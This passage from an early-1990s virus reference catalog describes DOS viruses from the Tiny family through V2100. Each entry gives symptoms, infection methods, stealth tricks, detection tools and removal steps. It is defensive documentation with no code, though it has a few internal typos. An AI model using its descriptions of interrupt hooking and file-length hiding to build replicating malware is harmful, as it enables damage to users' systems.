SHE-MAN!" While the message is being displayed, the disk in the current drive will be overwritten with garbage characters, rendering it unrecoverable. Programs infected with The Plague cannot be disinfected since the first 590 bytes of the program no longer exists. The programs must be deleted and replaced with clean copies. Virus Name: Tiny Family Aliases: Tiny-133, Tiny-134, Tiny-138, Tiny-143, Tiny-154, Tiny-156, Tiny-158, Tiny-159, Tiny-160, Tiny-167, Tiny-198 V Status: Rare Discovery: July, 1990 Symptoms: .COM file growth Origin: Bulgaria Eff Length: 133 - 198 Bytes (see below) Type Code: PRC - Parasitic Resident .COM Infector Detection Method: ViruScan V66+, Pro-Scan 2.01+ (larger variants only) Removal Instructions: Scan/D, or Delete infected files General Comments: The Tiny Family of Viruses was received by the author in July 1990 from Vesselin Bontchev of Bulgaria. All the viruses in this grouping share the same characteristics, with the only real difference is the effective length of the viral code. There were five (5) viruses included in the "family" as of July, 1990: Tiny-158, Tiny-159, Tiny-160, Tiny-167, and Tiny-198. In October 1990, five (5) additional viruses in this family were received from Vesselin Bontchev: Tiny-134, Tiny-138, Tiny-143, Tiny-154, and Tiny-156. In December 1990, an eleventh member was added to this family: Tiny-133. The first time a file infected with one of the Tiny Family viruses is executed on a system, the virus will install itself memory resident at memory segment 60h. This area of memory is normally only used by DOS when the system is booted, after that it is never used or referenced. Interrupt 21 will be hooked by the virus. After the virus is memory resident, the virus will infect any .COM program that is executed. Infected programs will have a file length increase of between 134 - 198 bytes, depending on which variant is present on the system. The file's date and time in the directory will also have been updated to the system date and time when the infection occurred. The Tiny Family of Viruses currently does not do anything but replicate. The viruses in this "family" are not related to the Tiny Virus documented below. Known members of the Tiny Family are: Tiny-133 : Similar to Tiny-134, this variant's effective length is 133 bytes. The bugs in Tiny-134 have been fixed, this virus is an excellent replicator. This variant has also been altered so that it cannot be detected by anti-viral utilities which were aware of other members of this family. Tiny-134 : This variant's effective length is 134 bytes. This variant is the only member of this family which is not a very viable virus, it will usually hang the system when it attempts to infect .COM files. Tiny-138 : Same as above, effective length is 138 bytes. Tiny-143 : Same as above, effective length is 143 bytes. Tiny-154 : Same as above, effective length is 154 bytes. Tiny-156 : Same as above, effective length is 156 bytes. Tiny-158 : Same as above, effective length is 158 bytes. Tiny-159 : Same as above, effective length is 159 bytes. Tiny-160 : Same as above, effective length is 160 bytes. Tiny-167 : Same as above, effective length is 167 bytes. Tiny-198 : Same as above, effective length is 198 bytes. Also see: Tiny Virus Virus Name: Tiny Virus Aliases: 163 COM Virus, Tiny 163 Virus V Status: Rare Discovery: June, 1990 Symptoms: COMMAND.COM & .COM file growth Origin: Denmark Eff Length: 163 Bytes Type Code: PNCK - Parasitic Non-Resident .COM Infector Detection Method: ViruScan V64+, VirexPC, F-Prot 1.12+ Removal Instructions: Scan/D, F-Prot 1.12+, or Delete infected files General Comments: The 163 COM Virus, or Tiny Virus, was isolated by Fridrik Skulason of Iceland in June 1990. This virus is a non-resident generic .COM file infector, and it will infect COMMAND.COM. The first time a file infected with the 163 COM Virus is executed, the virus will attempt to infect the first .COM file in the current directory. On bootable diskettes, this file will normally be COMMAND.COM. After the first .COM file is infected, each time an infected program is executed another .COM file will attempt to be infected. Files are infected only if their original length is greater than approximately 1K bytes. Infected .COM files will increase in length by 163 bytes, and have date/time stamps in the directory changed to the date/time the infection occurred. Infected files will also always end with this hex string: '2A2E434F4D00'. This virus currently does nothing but replicate, and is the smallest MS-DOS virus known as of its isolation date. The Tiny Virus may or may not be related to the Tiny Family documented elsewhere in this listing. Also see: Tiny Family Virus Name: Traceback Aliases: 3066 V Status: Extinct Discovered: October, 1988 Symptoms: .COM & .EXE growth, TSR, graphic display 1 hour after boot Origin: Eff Length: 3,066 bytes Type Code: PRsA - Parasitic Resident .COM & .EXE Infector Detection Method: ViruScan/X V67+, F-Prot, IBM Scan, Pro-Scan, VirexPC, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: M-3066, VirClean, F-Prot, VirexPC, Pro-Scan 1.4+, VirHunt 2.0+ or delete infected files General Comments: The Traceback virus infects both .COM and .EXE files, adding 3,066 bytes to the length of the file. After an infected program is executed, it will install itself memory resident and infect other programs that are opened. Additionally, if the system date is after December 5, 1988, it will attempt to infect one additional .COM or .EXE file in the current directory. If an uninfected file doesn't exist in the current directory, it will search the entire disk, starting at the root directory, looking for a candidate. This search process terminates if it encounters an infected file before finding a candidate non-infected file. This virus derives its name from two characteristics. First, infected files contain the directory path of the file causing the infection within the viral code, thus is it possible to "trace back" the infection through a number of files. Second, when it succeeds in infected another file, the virus will attempt to access the on-disk copy of the program that the copy of the virus in memory was loaded from so that it can update a counter in the virus. The virus takes over disk error handling while trying to update the original infected program, so if it can't infect it, the user will be unaware that an error occurred. The primary symptom of the Traceback virus having infected the system is that if the system date is after December 28, 1988, the memory resident virus will produce a screen display with a cascading effect similar to the Cascade/1701/1704 virus. The cascading display occurs one hour after system memory is infected. If a keystroke is entered from the key- board during this display, a system lockup will occur. After one minute, the display will restore itself, with the characters returning to their original positions. This cascade and restore display are repeated by the virus at one hour intervals. Known variant(s) of the Traceback virus are: Traceback-B : Similar to the Traceback virus, the major differences are that Traceback-B will infect COMMAND.COM and there is no cascading display effect after the virus has been resident for one (1) hour. Infected files will also not contain the name of the file from which the virus originally became memory resident, but instead the name of the current file. A text string: "MICRODIC MSG" can be found in files infected with Traceback-B. If the system is booted from a diskette whose copy of COMMAND.COM is infected, attempting to execute any program will result in a memory allocation error and the system being halted. Origin: Spain, March 1990. Traceback-B2: Similar to Traceback-B2, this variant has the cascading display effect after the virus has been resident in memory for one (1) hour. The text string " XPO DAD " replaces the "MICRODIS MSG" text string in Traceback-B. Origin: Spain, May 1990. Also see: Traceback II Virus Name: Traceback II Aliases: 2930 V Status: Extinct Discovered: October, 1988 Symptoms: .COM & .EXE growth, TSR, graphic display 1 hour after boot Origin: Eff Length: 2,930 Bytes Type Code: PRA - Parasitic Resident .COM & .EXE Infector Detection Method: ViruScan/X V67+, F-Prot, IBM Scan, Pro-Scan, VirexPC, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: Scan/D/X, F-Prot, VirexPC, Pro-Scan 1.4+, VirHunt 2.0+, or delete infected files. General Comments: The Traceback II virus is a variant of the Traceback (3066) virus. It is believed that Traceback II predates the Traceback virus, however the Traceback virus was isolated and reported first. As with the Traceback virus, the Traceback II virus is memory resident and infects both .COM & .EXE files. The comments indicated for the Traceback virus generally apply to the Traceback II virus, with the exception that the file length increase is 2,930 bytes instead of 3,066 bytes. Known variant(s) of the Traceback II Virus are: Traceback II-B: Similar to Traceback II, this variant will infect COMMAND.COM. When the cascading effect occurs, the screen will not be restored, instead the system will be hung requiring it to be powered off and rebooted. Also see: Traceback Virus Name: Turbo 448 Aliases: @ Virus, Turbo @, Polish-2 V Status: Rare Discovered: November, 1990 Symptoms: .COM growth; File not found errors with some utilities. Origin: Hungary Eff Length: 448 Bytes Type Code: PRCK - Parasitic Resident .COM Infector Detection Method: ViruScan V71+ Removal Instructions: Scan/D, or Delete infected files General Comments: The Turbo 448, or @ Virus, was discovered in Hungary in November, 1990. This virus is a memory resident infector of .COM files, including COMMAND.COM. The first time a program infected with the Turbo 448 Virus is executed, the virus will install itself memory resident at the end of the Command Interpretor in memory. Total system memory and available free memory will not decrease. Interrupt 21 will be hooked by the virus. The Turbo 448 Virus is unusual in that it does not infect programs when they are executed. Instead, it infects .COM files when they are openned for some other reason besides execution. For example, if the virus is memory resident a program A.COM is copied to B.COM, both programs will become infected by the virus. Infected files will increase in length by 448 bytes, with the virus being located at the end of the file. The program's date and time in the disk directory will also have been updated to the system date and time when the file was infected. The following text string can be found at the end of all infected programs: "Udv minden nagytudasunak! Turbo @" Another interesting behavior of this virus is that when the virus is memory resident, anti-viral products which are unaware of the Turbo 448's presence in memory will not function properly. After the third file is read, the program may fail due to a "file not found" error being received when it attempts to open the fourth program. Also see: Turbo Kukac 9.9 Virus Name: Turbo Kukac Aliases: Kukac, Turbo Kukac 9.9, Polish-2 V Status: Rare Discovered: November, 1990 Symptoms: .COM growth; Decrease in total system and free available memory; File not found errors with some utilities. Origin: Hungary Eff Length: 512 Bytes Type Code: PRCK - Parasitic Resident .COM Infector Detection Method: ViruScan V71+ Removal Instructions: Scan/D, or Delete infected files General Comments: The Turbo Kukac, or Kukac, Virus was discovered in Hungary in November, 1990. This virus is a memory resident infector of .COM files, including COMMAND.COM. It is very similar to the Turbo 448 Virus. The first time a program infected with the Turbo Kukac Virus is executed, the virus will install itself memory resident following the Command Interpretor and any previously loaded TSRs. Total system memory and available free memory will decrease by 1,040 bytes. Interrupts 05 and 21 will be hooked by the virus. Note that this virus does not use a low system memory TSR, but instead creates a sort of "hole" in memory for its usage. Like the Turbo 448 Virus, this virus does not infect program when they are executed. Instead, it infects .COM files when they are openned for some other reason besides execution. For example, if the virus is memory resident a program A.COM is copied to B.COM, both programs will become infected by the virus. Infected files will increase in length by 512 bytes with the virus being located at the end of the file. The program's date and time in the directory will also have been updated to the system date and time when the file was infected. The following text string can be found at the end of all infected programs: "Turbo Kukac 9.9 $" An interesting behavior of this virus is that when the virus is memory resident, anti-viral products which are unaware of the Turbo Kukac's presence in memory will not function properly. After the fourth file is read, the program may fail due to a "file not found" error being received when it attempts to open the fifth program. Also see: Turbo 448 Virus Name: Typo Boot Aliases: Mistake V Status: Rare Discovered: June, 1989 Symptoms: BSC, Resident TOM, garbled printout. Origin: Israel Eff Length: N/A Type Code: BRt - Resident Boot Sector Infector Detection Method: ViruScan, F-Prot, IBM Scan, Pro-Scan, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: MDisk, Pro-Scan 1.4+, F-Prot, or DOS SYS Command General Comments: The Typo Boot virus was first isolated in Israel by Y. Radai in June, 1989. This virus is a memory resident boot sector infector, taking up 2K at the upper end of system memory once it has installed itself memory resident. The major symptom that will be noticed on systems infected with the Typo Boot virus is that certain characters in printouts are always replaced with other phonetically similar characters. Since the virus also substitutes hebrew letters for other hebrew letters, the virus was most likely written by someone in Israel. Digits in numbers may also be transposed or replaced with other numbers. The substitutions impact printouts only, the screen display and data in files are not affected. The Typo Boot virus is similar structurally to the Ping Pong virus, and may be a variant of Ping Pong. It can be removed from a disk by using MDisk, CleanUp, DOS SYS command, or just about any Ping Pong disinfector. Virus Name: Typo COM Aliases: Fumble, 867 V Status: Extinct Discovered: November, 1989 Symptoms: .COM growth, Resident TOM, garbled printout (see text). Origin: England Eff Length: 867 Bytes Type Code: PRtC - Parasitic Resident .COM Infector Detection Method: ViruScan/X V67+, F-Prot, IBM Scan, Pro-Scan, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: Scan/D/X, F-Prot, Pro-Scan 1.4+, VirHunt 2.0+, or delete infected files General Comments: The Typo COM virus is similar to the Typo Boot virus in that it will garble data that is sent to the parallel port once it has activated. Unlike the Boot virus, the COM virus infects generic .COM files. This virus was first reported by Joe Hirst of Brighton, UK, in November, 1989. The Typo COM virus only infects .COM files on even-numbered days. Virus Name: USSR Aliases: V Status: Rare Discovered: October, 1990 Symptoms: .EXE growth; hard disk boot sector and partition table damage; system hangs; long program load times Origin: USSR Eff Length: 576 Bytes Type Code: PNE - Parasitic Non-Resident .EXE Infector Detection Method: ViruScan V71+, Pro-Scan 2.01+ Removal Instructions: Scan/D, or Delete infected Files General Comments: The USSR Virus was discovered in October, 1990 in the USSR. It is an encrypted, non-resident generic infector of .EXE files. Each time a program infected with the USSR Virus is executed, it will search the currect directory for the first uninfected .EXE file. If it finds one, it will attempt to infect it. Sometimes when the virus attempts to infect a file, it will hang the system leaving the drive light on, however most of the time the virus is successful. Infected files will increase in length by 576 to 586 bytes, with the virus located at the end of the file. Systems infected with this virus may go to boot their system from its hard disk only to find that the hard disk's boot sector has been removed, and the partition table has been damaged, thus rendering the hard disk inaccessible. This damage can be repaired using Norton Disk Doctor, or MDisk with the /P option. Infected systems will also experience longer than normal load times when infected programs are executed. The longer than normal load time is due to the virus searching for a file to infect, and then infecting the candidate file if one was found. Virus Name: USSR 311 Aliases: V-311 V Status: New Discovered: January, 1991 Symptoms: .COM growth; COMMAND.COM renamed to COMMAND.CON Origin: USSR Eff Length: 311 Bytes Type Code: PNCK - Parasitic Non-Resident .COM Infector Detection Method: ViruScan V74+ Removal Instructions: Scan/D, or Delete infected files General Comments: The USSR 311, or V-311, Virus was submitted in January, 1991. It originated in the USSR. This virus is a non-resident infector of .COM programs, including COMMAND.COM. When a program infected with USSR 311 is executed, the virus will check the system time to see if the seconds value is equal to one of 16 values. If it was equal to one of those 16 values, COMMAND.COM will be renamed to COMMAND.CON. Whether or not the rename of COMMAND.COM occurred, the virus will then infect one .COM program in the current directory. Infected .COM programs will increase in length by 311 bytes, the virus will be located at the end of the infected file. The file's time in the disk directory will also be modified to be 11:19:32, the infection marker for this virus. The file date in the directory is not altered. USSR 3111 will also alter the file attributes for the file in the directory. In particular, bits 8 thru 15 will be reset, which may produce unexpected results in environments that make use of these bits. Virus Name: USSR 492 Aliases: V Status: New Discovered: December, 1990 Symptoms: .COM file growth; File date/time changes Origin: USSR Eff Length: 495 - 508 Bytes Type Code: PRfCK - Parasitic Resident .COM Infector Detection Method: ViruScan V74+ Removal Instructions: Scan/D, or Delete infected files General Comments: The USSR 492 Virus was submitted in December, 1990 and is from the USSR. This virus is a memory resident .COM file infector, it will infect COMMAND.COM. When the first program infected with USSR 492 is executed, the virus will install itself memory resident in high system memory, but below the 640K DOS boundary. This memory is not reserved by the virus. Interrupt 21 will be hooked by the virus. At the time of going memory resident, the virus will check to determine if COMMAND.COM on the C: drive is infected, if it isn't, then the virus will infect it. Once USSR 492 is memory resident, it will infect any .COM program which is executed. Execution of COMMAND.COM on the A: drive is the only way to infect COMMAND.COM on A:. Programs infected with USSR 492 will have a file length increase of 495 to 508 bytes. The virus will be located at the end of infected programs. Infected programs will also have their date and time in the disk directory changed to the system date and time when infection occurred. USSR 492 does not appear to do anything besides replicate. Virus Name: USSR 516 Aliases: Leapfrog V Status: Rare Discovered: December, 1990 Symptoms: .COM file growth Origin: USSR Eff Length: 516 Bytes Type Code: PRCK - Parasitic Resident .COM Infector Detection Method: ViruScan V74+ Removal Instructions: Scan/D, or Delete infected files General Comments: The USSR 516 Virus was submitted in December, 1990. It is from the USSR. This virus is a memory resident infector of .COM programs, including COMMAND.COM. It infects on file execution. The first time a program infected with the USSR 516 Virus is executed, the virus will install itself memory resident in a "hole in memory" between MSDOS and the DOS Stacks. This area will be labelled DOS Data. Interrupt 21 will be hooked by the virus. There will be no change in total system memory or available free memory. After the virus is memory resident, it will infect .COM programs which are executed that had an uninfected file length which was greater than 512 bytes. Infected .COM programs will have their length increased by 516 bytes, the virus will be located at the end of the program. USSR 516 does not appear to do anything besides replicate. The original submitted sample was not a natural infection of this virus, so this may be a research virus. Virus Name: USSR 600 Aliases: V Status: Rare Discovered: December, 1990 Symptoms: .COM file growth Origin: USSR Eff Length: 600 Bytes Type Code: PRhCK - Parasitic Resident .COM Infector Detection Method: ViruScan V74+ Removal Instructions: Scan/D, or Delete infected files General Comments: The USSR 600 Virus was submitted in December, 1990, and is from the USSR. This virus is a memory resident infector of .COM programs, including COMMAND.COM. When the first program infected with USSR 600 is executed, the virus will install itself memory resident at the top of system memory but below the 640K DOS boundary. The DOS ChkDsk program will indicate that total system memory and available free memory are 2,048 bytes less than expected. This virus does not move the interrupt 12 return. USSR 600 uses interrupts 21 and 24. Once USSR 600 is memory resident, it will infect .COM programs which are executed if they have an original file length of at least 600 bytes. Infected files will increase in size by 600 bytes, and the virus's code will be located at the beginning of the infected program. It is unknown if this virus does anything besides replicate. Virus Name: USSR 707 Aliases: V Status: Rare Discovered: December, 1990 Symptoms: .COM file growth; decrease in total system and available memory Origin: USSR Eff Length: 707 Bytes Type Code: PRtCK - Parasitic Resident .COM Infector Detection Method: ViruScan V74+ Removal Instructions: Scan/D, or Delete infected files General Comments: The USSR 707 Virus was submitted in December, 1990. It is from the USSR. This virus is a memory resident infector of .COM programs, including COMMAND.COM. When the first program infected with the USSR 707 Virus is executed, this virus will install itself memory resident at the top of system memory but below the 640K DOS boundary. It will move the interrupt 12 return so that the virus in memory cannot be overwritten. USSR 707 makes use of interrupt 21, which will now map to the virus in high system memory. Total system memory and available free memory will be 720 bytes less than expected. After USSR 707 is memory resident, any .COM program executed will become infected by the virus. Infected .COM programs will have a file length increase of 707 bytes, the virus will be located at the end of the file. If COMMAND.COM is executed, it will be infected. It is unknown if USSR 707 does anything besides replicate. Virus Name: USSR 711 Aliases: V Status: Rare Discovered: December, 1990 Symptoms: .COM file growth; system hangs; decrease in total system and available memory Origin: USSR Eff Length: 711 Bytes Type Code: PRhC - Parasitic Resident .COM Infector Detection Method: ViruScan V74+ Removal Instructions: Scan/D, or Delete infected files General Comments: The USSR 711 Virus was submitted in December, 1990, and comes from the USSR. This virus is a memory resident infector of .COM files. It does not infect COMMAND.COM. When the first program infected with USSR 711 is executed, the virus will install itself memory resident at the top of system memory but below the 640K DOS boundary. This memory is reserved. The virus also hooks interrupts 08, 13, and 21. The DOS ChkDsk program will indicate that total system memory and available free memory is 704 bytes less than what the user expects. The interrupt 12 return is not altered by this virus. After USSR 711 is memory resident, any .COM file which is executed that had an original file length of at least 1600 bytes will be infected by the virus. Infected .COM files will increase in size by 705 to 717 bytes, and the virus will be located at the end of the infected file. Systems infected with USSR 711 may notice occasional system hangs which may occur when this virus attempts to infect .COM programs. It is unknown if USSR 711 does anything besides replicate and occasionally hang the system when infecting files. Virus Name: USSR 948 Aliases: V Status: Rare Discovered: December, 1990 Symptoms: .COM & .EXE growth; decrease in total system and available memory Origin: USSR Eff Length: 948 Bytes Type Code: PRhA - Parasitic Resident .COM & .EXE Infector Detection Method: ViruScan V74+ Removal Instructions: Scan/D, or Delete infected files General Comments: The USSR 948 Virus was received in December, 1990, and originated in the USSR. This virus is a memory resident infector of .COM and .EXE files, and will also infect COMMAND.COM. When the first program infected with USSR 948 is executed, this virus will install itself memory resident at the top of system memory but below the 640K DOS boundary. The interrupt 12 return will not be altered, although the memory in use by the virus is reserved. Interrupts 1C and 21 will be hooked by the virus. After USSR 948 is memory resident, and .COM or .EXE program which is executed or openned for any reason will become infected by the virus. Infected programs, with the exception of COMMAND.COM, will increase in size by between 950 to 963 bytes. In the case of COMMAND.COM, the virus will overwrite a portion of the stack space located in the file, so the file will not have a length change. In all cases, the file date and times in the disk directory are not altered. Infected programs will have the virus located at the end of the file. It is unknown if USSR 948 does anything besides replicate. Virus Name: USSR 1049 Aliases: V Status: Rare Discovered: December, 1990 Symptoms: .COM & .EXE growth; system hangs; decrease in total system and available free memory Origin: USSR Eff Length: 1,049 Bytes Type Code: PRhA - Parasitic Resident .COM & .EXE Infector Detection Method: ViruScan V74+ Removal Instructions: Scan/D, or Delete infected files General Comments: The USSR 1049 virus was received in December, 1990. It originated in the USSR. This virus is a memory resident infector of .COM and .EXE files, and does not infect COMMAND.COM. When the first program infected with USSR 1049 is executed, the virus will install itself memory resident at the top of system memory but below the 640K DOS boundary. This memory will be 1,056 bytes in size and is reserved. The interrupt 12 return is not moved. Interrupt 21 will be hooked by the virus. After USSR 1049 is memory resident, the virus will infect .COM and .EXE files when they are executed. The virus, however, will not infect very small .EXE files. Infected files will increase in size by 1,051 to 1,064 bytes, the virus will be located at the end of the infected program. Systems infected with the USSR 1049 Virus may experience system hangs when attempting to execute .EXE programs. These hangs occassionally occur when the virus infects .EXE program, though the program being infected will actually be infected. It is unknown if USSR 1049 does anything besides replicate. Virus Name: USSR 1689 Aliases: SVC V4.00 V Status: Rare Discovered: December, 1990 Symptoms: .COM & .EXE growth; system hangs Origin: USSR Eff Length: 1,689 Bytes Type Code: PRA - Parasitic Resident .COM & .EXE Infector Detection Method: ViruScan V74+ Removal Instructions: Scan/D, or Delete infected files General Comments: The USSR 1689 Virus was received in December, 1990. It is from the USSR. This virus is not a very viable virus, though it does infect both .COM and .EXE programs. When the first program infected with USSR 1689 is executed, this virus will install itself memory resident in the in-memory command interpretor. After the virus is memory resident, the virus will infect the next .COM or .EXE program executed, though a system hang will also occur. Infected programs will increase in size by 1,689 bytes, though on files larger than 1,689 bytes, the virus will hide the file length increase if the virus is already in memory. Files originally smaller than 1,689 bytes will indicate a file size increase in the DOS directory when the virus is resident. In all cases, the virus will be located at the end of infected programs. With the system hang which occurs each time a program is infected by this virus, it is not a very viable virus, and should not be considered a threat in its current state. Virus Name: USSR 2144 Aliases: V Status: Rare Discovered: December, 1990 Symptoms: .COM & .EXE growth; decrease in total system and available memory Origin: USSR Eff Length: 2,144 Bytes Type Code: PRhAK - Parasitic Resident .COM & .EXE Infector Detection Method: ViruScan V74+ Removal Instructions: Scan/D, or Delete infected files General Comments: The USSR 2144 Virus was submitted in December, 1990, and is from the USSR. This virus is a memory resident infector of .COM and .EXE files, including COMMAND.COM. When the first program infected with the USSR 2144 Virus is executed, the virus will install itself memory resident at the top of system memory but below the 640K DOS boundary. The DOS ChkDsk program will indicate memory values that show 4,608 bytes less total system memory and available free memory than expected. This virus does not move the interrupt 12 return. The virus also directly alters the interrupt page in memory so that some interrupts will now execute the virus's code. After USSR 2144 is memory resident, and program which was originally greater in length than 2K that is executed or openned for reason will become infected by the virus. Infected .COM programs will increase in length by 2,144 bytes. .EXE programs will increase in length by 2,144 to 2,59 bytes. In both cases, the virus will be located at the end of infected files. Infected files will not have their date and time in the disk directory altered, and this virus does not hide the change in file length of infected files. It is unknown if USSR 2144 does anything besides replicate. Virus Name: V651 Aliases: Eddie 3, Stealth Virus V Status: Rare Discovered: April, 1990 Symptoms: .COM & .EXE growth, decrease in system and free memory, file allocation errors Origin: Sofia, Bulgaria Eff Length: 651 Bytes Type Code: PRtA - Parasitic Resident .COM & .EXE Infector Detection Method: ViruScan V66+, VirHunt 2.0+ Removal Instructions: Scan/D, VirHunt 2.0+, or Delete infected files General Comments: The V651, or Eddie 3, Virus was isolated in Sofia, Bulgaria in April 1990 by Vesselin Bontchev. V651 is believed to have been written by the same author as Dark Avenger, V1024, and V2000. This virus is a generic infector for .COM and .EXE files. The first time a program infected with V651 is executed, the virus will install itself memory resident. Using the DOS CHKDSK program, total system memory, as well as available free memory, will be decreased by 688 bytes. Later, as programs with a length of 651 bytes or greater are executed, they will be infected by the virus. Infected files increase in length by 651 bytes, though the increase in file length will not be seen by performing a directory command with the virus present in memory. The total available disk space will also be adjusted by the virus so that the decrease in available disk space due to the virus's activities cannot be seen. Powering off the system and booting from a known clean boot diskette, followed by issuing a directory command will result in the correct infected file lengths being displayed as well as the actual available space on the disk. Infected files can be easily identified as the text string "Eddie Lives." appears near the end of the infected file. These files will also be 651 bytes longer than expected when the virus is not present in memory. A side effect of the V651 virus is that lost clusters may occur on infected systems if the CHKDSK /F command is used. While this does not occur for all infected files, the number of errors reported by CHKDSK will be much higher statistically when V651 is present. Unlike Dark Avenger and V2000, this virus does not infect files on any file open. It only infects when programs are executed. Also see: Dark Avenger, V1024, V2000 Virus Name: V800 Aliases: Live after Death Virus, Stealth Virus V Status: Rare Discovered: May, 1990 Symptoms: .COM growth, decrease in total system and available memory Origin: Bulgaria Eff Length: 800 Bytes Type Code: PRC - Parasitic Resident .COM Infector Detection Method: ViruScan V63+, Pro-Scan 1.4+, F-Prot 1.12+ Removal Instructions: CleanUp V64+, Scan/D, F-Prot 1.12+, or delete infected files General Comments: The V800, or Live after Death, Virus was isolated in Bulgaria by Vesselin Bontchev in May, 1990. The V800 is a self-encrypting memory resident .COM infector, and it does not infect COMMAND.COM. This virus is thought to have been written by the same person as the Dark Avenger virus since many of the same techniques are used. The virus has received an alias of the Live after Death Virus as the virus contains the "Live after Death" string, though it cannot be seen in infected files as the virus is encrypted. The first time an infected program is run on a system, the V800 Virus will install itself memory resident. In the process of installing itself resident, it will decrease available system memory by 16K, using 8,192 Bytes for itself in the top of available free memory. It will also hook interrupt 2A. Once in memory, every time a .COM file is attempted to be executed, the virus will check to see if it is a candidate for infection. Whether the file will be infected depends on the size of the .COM file when it is attempted to be executed. In no event is a .COM file smaller than 1024 bytes infected, but not all .COM files over 1024 bytes are infected either. The V800 Virus will reinfect .COM files, with the file's size increasing by 800 bytes with each infection. It does not, however, infect .COM files more than eight times. Known variant(s) of the V800 Virus include: V800M : Very similar to V800, the major difference is that V800M will infect files on both file open and file execute, putting this variant into the "Stealth" virus category. When the virus becomes memory resident, total system and free memory will decrease by only 8,192 bytes. This variant does not have the "Live after Death" string in it. Virus Name: V1024 Aliases: Dark Avenger III, Stealth Virus V Status: Rare Discovered: May, 1990 Symptoms: TSR; decrease in available free memory Origin: Bulgaria Eff Length: 1,024 Bytes Type Code: PRA - Parasitic Resident .COM & .EXE Infector Detection Method: ViruScan V64+ Removal Instructions: Scan/D, or Delete infected files General Comments: The V1024, or Dark Avenger III, Virus was discovered in Bulgaria in April 1990 by Daniel Kalchev. V1024 is a memory resident generic infector of .COM and .EXE files. It is believed to have been written by the same person that wrote Dark Avenger and V2000. This virus may actually be an earlier version of the Dark Avenger virus, it has many of the same characteristics, though it does not infect all files when they are opened for any reason. The first time a program infected with V1024 is executed, the virus will install itself memory resident. At this time, it checks to see if several interrupts are being monitored, including interrupts 1 and 3. If interrupts 1 and 3 are monitored, V1024 allow the current program to run, but any subsequent program executed will hang the system and V1024 will not replicate. When V1024 is memory resident, infected systems will experience a decrease in free memory by 1,072 bytes. Total system memory will not have changed. The virus will have remapped several interrupts by altering their location in the interrupt map page in memory. These interrupts will now be controlled by V1024. After V1024 becomes memory resident, the virus will infect any program executed which is greater in length than 1,024 bytes. Both .COM and .EXE files are infected, COMMAND.COM is not infected. Infected files increase in length by 1,024 bytes, though this increase will not appear if the virus is present in memory and a DIR listing is done. V1024 infected files can be identified by a text string which appears very close to the end of infected files. The text string is: '7106286813'. V1024 does not appear contain any activation date. Also see: Dark Avenger, V2000, V651 Virus Name: V2000 Aliases: Dark Avenger II, Stealth Virus, Travel Virus V Status: Rare Discovered: 1989 Symptoms: TSR; .COM, .EXE, .OV? growth (see text); crashes; crosslinked files following CHKDSK. Origin: Bulgaria Eff Length: 2,000 Bytes Type Code: PRA - Parasitic Resident .COM & .EXE Infector Detection Method: ViruScan V59+, Pro-Scan 1.4+, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: Scan/D, Pro-Scan 1.4+, or delete infected files General Comments: The V2000, or Dark Avenger II, virus is a memory resident generic file infector. The first isolated samples of this virus were received from Bulgaria, where it was isolated by Daniel Kalchev and Niki Spahiev. V2000 will infect .COM, .EXE, and Overlay files, as well as COMMAND.COM. When the first infected file is executed, the virus installs itself memory resident, and then infected COMMAND.COM if it has not already been infected. Then, when an executable file is opened for any reason, it is infected if it hasn't been previously infected. Increased file lengths will not be shown if the V2000 virus is present in memory when a DIR command is issued. Issuing a CHKDSK /F command on infected systems may result in crosslinking of files since the directory information may not appear to match the entries in the file allocation table (FAT). Systems infected with the V2000 virus will experience unexpected system crashes, resulting in lost data. Some systems may also become unbootable due to the modification of COMMAND.COM or the hidden system files. One of the following two text strings will appear in the viral code in infected files, thus accounting for the alias of Travel Virus used in Bulgaria: "Zopy me - I want to travel" "Copy me - I want to travel" There are reports from Bulgaria that the V2000 virus looks for and hangs the system if programs written by Vesselin Bontchev are attempted to be executed. This would explain the presence of the following copyright notice within the viral code: "© 1989 by Vesselin Bontchev" Known variants of the V2000 virus include: V2000-B/Die Young : Similar to the V2000 virus, the main difference is that the text string "Zopy me - I want to travel" is now "Only the Good die young..." or "Mnly the Good die young..." and the encryption used by the virus is different. This variant is actually the original virus, predating V2000. Also see: Dark Avenger, V1024, V651 Virus Name: V2100 Aliases: 2100, Stealth Virus, UScan Virus V Status: Rare Discovered: July, 1990 Symptoms: file allocation errors, decrease in system and free memory Origin: Bulgaria Eff Length: 2,100 Bytes Type Code: PRtA - Parasitic Resident .COM & .EXE Infector Detection Method: ViruScan V66+ Removal Instructions: Scan/D, or delete infected files General Comments: The V2100, or 2100, Virus was first isolated in Sofia, Bulgaria by Vesselin Bontchev in July 1990. It is a resident generic infector of .COM, .EXE, and overlay files. It will also infect COMMAND.COM. This virus appears to have been originally released into the public domain on an anti-viral program named UScan which was uploaded to a BBS in Europe. While not all copies of UScan are carriers of this virus, there was one version which exists that has the virus embedded in its program code. The virus cannot be detected on this trojan version using search algorithms for this virus. V2100 is believed to have been written by the author of Dark Avenger. The first time a program infected with V2100 is executed, the virus will install itself memory resident above top of memory but below the 640K boundary. The top of memory returned by interrupt 12 will be lower than expected by 4,288 bytes. Likewise, free memory will have decreased by 4,288 bytes. At this same point, V2100 will infect COMMAND.COM though the change in file length will be hidden by the virus. Once the virus is memory resident, it will infect any .COM, .EXE, or overlay file with a file length of at least 2100 bytes that is executed or opened for any reason. The simple act of copying an executable file will result in both the source and target files becoming infected. Infected files will be 2,100 bytes longer, though the virus will hide the change in file length so that it isn't noticeable when directories are listed. In some cases, infected files will appear to be 2,100 bytes smaller than expected if the virus is present in memory. Systems infected with the V2100 virus will notice file allocation errors occurring, along with crosslinking of files. Due to these errors, some files may become corrupted. These file allocation errors are truly errors, they exist whether or not the virus is present in memory. A side note on the V2100 Virus: if the system had previously been infected with the Anthrax virus, V2100's introduction will result in the Anthrax virus again being present in the hard disk partition table. This effect occurs because Anthrax stores a copy of itself on the last sectors of the hard disk. When V2100 becomes resident, it searches the last 16 cylinders of the hard disk for a copy of Anthrax. If V2100 finds the hidden copy of Anthrax, it copies it into the hard disk's partition table. On the next system boot from the hard disk, Anthrax will once again be active on the system. Virus Name: V2P2 Aliases: V Status: Research Discovered: June, 1990 Symptoms: .COM file growth Origin: Minnesota, USA Eff Length: 1,426 - 2,157 Bytes Type Code: PNCK - Parasitic Non-Resident .COM Infector Detection Method: ViruScan/X V67+, Pro-Scan 2.01+ Removal 